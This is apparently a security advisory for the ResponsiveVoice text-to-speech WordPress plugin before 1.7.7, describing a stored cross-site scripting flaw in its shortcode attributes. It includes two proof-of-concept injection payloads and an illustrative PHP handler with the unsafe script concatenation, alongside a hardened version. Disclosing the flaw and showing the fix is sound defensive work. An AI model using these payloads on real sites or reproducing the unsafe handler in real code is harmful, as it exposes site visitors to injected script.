The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
```
[responsivevoice_button voice='"); alert(1); ("']
[responsivevoice_button voice='");}}; jQuery(function() {alert(1); }); if(false){if(false){("']
```
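The class of bug described above, shown as an added example that is not the plugin's own code: a shortcode handler that concatenates an attribute into inline JavaScript, next to a hardened handler. The shortcode name `demo_voice_button`, the function names, the `demoSpeak` call, the voice list and the shape of the unsafe sink are assumptions for illustration; the code assumes it is loaded inside a WordPress plugin.

```php
<?php
// Added illustration with hypothetical names; not taken from the plugin's source.

// Vulnerable pattern (assumed sink shape): the attribute is concatenated into
// inline JavaScript unchanged, so a double quote in `voice` closes the string
// literal and whatever follows is parsed as script.
function demo_voice_button_unsafe( $atts ) {
    $atts = shortcode_atts( array( 'voice' => 'UK English Female' ), $atts );
    return '<script>demoSpeak("' . $atts['voice'] . '");</script>';
}

// Hardened pattern: validate against an allow-list, then pass the value as
// data in an HTML attribute instead of building script source from it.
function demo_voice_button_safe( $atts ) {
    // Constructed allow-list; a real plugin would list the voices it supports.
    $allowed = array( 'UK English Female', 'UK English Male', 'US English Female' );

    $atts  = shortcode_atts( array( 'voice' => $allowed[0] ), $atts, 'demo_voice_button' );
    $voice = sanitize_text_field( $atts['voice'] );

    // Validation: an unknown value is replaced, never echoed back.
    if ( ! in_array( $voice, $allowed, true ) ) {
        $voice = $allowed[0];
    }

    // Escaping for the output context: esc_attr() for the attribute value,
    // esc_html__() for the label. A static, enqueued script reads
    // button.dataset.voice, so user input never becomes JavaScript source.
    return sprintf(
        '<button type="button" class="demo-voice-button" data-voice="%s">%s</button>',
        esc_attr( $voice ),
        esc_html__( 'Listen', 'demo-textdomain' )
    );
}

// Only the hardened handler is registered.
add_shortcode( 'demo_voice_button', 'demo_voice_button_safe' );
```

If a value must be printed inside a script block, `wp_json_encode()` produces a quoted JavaScript literal, and `wp_add_inline_script()` keeps it attached to an enqueued script handle.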
| CPE | Name | Operator | Version |
|---|---|---|---|
| | responsivevoice-text-to-speech | lt | 1.7.7 |